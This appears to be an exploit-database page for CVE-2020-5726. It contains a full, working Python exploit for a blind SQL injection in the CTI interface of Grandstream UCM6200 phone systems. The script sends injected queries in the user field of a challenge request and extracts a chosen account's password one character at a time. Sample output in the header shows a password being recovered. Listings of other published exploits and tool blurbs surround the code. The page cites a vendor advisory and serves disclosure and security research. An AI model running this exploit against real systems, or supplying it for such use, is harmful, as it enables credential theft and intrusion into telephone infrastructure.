Become a patron and gain access to the dashboard, Schedule scan, API and Search

Search for hundreds of thousands of exploits

"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"

Author

Exploit author

"Jacob Baines"

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-03-31

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5726
# Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1
--user lolwat
# [+] Reaching out to 192.168.2.1:8888
# [+] Password length 9
# [+] The password is LabPass1%

import sys
import time
import json
import struct
import socket
import argparse

def send_cti_with_length(sock, payload):
    to_send = struct.pack('>I', len(payload))
    to_send = to_send + payload
    sock.sendall(to_send)

    return recv_cti_with_length(sock)

def recv_cti_with_length(sock):
    length = sock.recv(4)
    length = struct.unpack('>I', length)[0]
    response = sock.recv(length)
    return response

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8888)
top_parser.add_argument('--user', action="store", dest="user",
required=True, help="The user to brute force")
args = top_parser.parse_args()


print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport))

length = 0
while length < 100:

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((args.rhost, args.rport))

    challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" +
args.user.encode('utf-8') + b"' AND LENGTH(user_password)=" +
str(length).encode('utf-8') + b"--")
    inject_result = json.loads(challenge_resp)

    if (inject_result['status'] == 0):
        break
    else:
        length = length + 1

    sock.close()

if length == 100:
    print('[-] Failed to discover the password length')
    sys.exit(1)

print('[+] Password length', length)

password = ''
while len(password) < length:
    value = 0x20
    while value < 0x80:

        if value == 0x22 or value == 0x5c:
            temp_pass = password + '\\'
            temp_pass = temp_pass + chr(value)
        else:
            temp_pass = password + chr(value)

        temp_pass_len = len(temp_pass)

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((args.rhost, args.rport))

        challenge_resp = send_cti_with_length(sock,
b"action=challenge&user=" + args.user.encode('utf-8') + b"' AND
user_password LIKE \'" + temp_pass.encode('utf-8') + b"%' AND
substr(user_password,1," + str(temp_pass_len).encode('utf-8') + b") = '" +
temp_pass.encode('utf-8') + b"'--")
        inject_result = json.loads(challenge_resp)

        sock.close()

        if (inject_result['status'] == 0):
            password = temp_pass
            break
        else:
            value = value + 1
            continue

    if value == 0x80:
        print('oh no.')
        sys.exit(0)

print('[+] The password is', password)
Release Date Title Type Platform Author
2020-10-16 "Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)" webapps php "Rahul Ramkumar"
2020-10-16 "Hotel Management System 1.0 - Remote Code Execution (Authenticated)" webapps php Aporlorxl23
2020-10-16 "Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)" webapps php b1nary
2020-10-16 "aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)" webapps python "รœnsal Furkan Harani"
2020-10-16 "Employee Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "Company Visitor Management System (CVMS) 1.0 - Authentication Bypass" webapps php "OฤŸuz Tรผrkgenรง"
2020-10-16 "Employee Management System 1.0 - Cross Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-16 "Alumni Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-16 "CS-Cart 1.3.3 - authenticated RCE" webapps php 0xmmnbassel
2020-10-16 "Seat Reservation System 1.0 - Unauthenticated SQL Injection" webapps php "Rahul Ramkumar"
Release Date Title Type Platform Author
2020-04-17 "Cisco IP Phone 11.7 - Denial of service (PoC)" webapps hardware "Jacob Baines"
2020-04-08 "Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)" webapps hardware "Jacob Baines"
2020-03-31 "Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection" webapps hardware "Jacob Baines"
2020-03-31 "Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection" webapps hardware "Jacob Baines"
2020-03-24 "UCM6202 1.0.18.13 - Remote Command Injection" webapps hardware "Jacob Baines"
2019-10-31 "MikroTik RouterOS 6.45.6 - DNS Cache Poisoning" remote hardware "Jacob Baines"
2019-07-30 "Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming" webapps hardware "Jacob Baines"
2019-05-03 "Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection" webapps hardware "Jacob Baines"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-11 "Indusoft Web Studio 8.1 SP2 - Remote Code Execution" remote multiple "Jacob Baines"
2018-12-21 "Netatalk < 3.1.12 - Authentication Bypass" remote multiple "Jacob Baines"
2018-10-10 "MicroTik RouterOS < 6.43rc3 - Remote Root" remote hardware "Jacob Baines"
2018-09-18 "NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)" remote hardware "Jacob Baines"
2017-06-14 "HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution" remote hardware "Jacob Baines"
2016-10-20 "MiCasaVerde VeraLite - Remote Code Execution" remote hardware "Jacob Baines"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48270/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.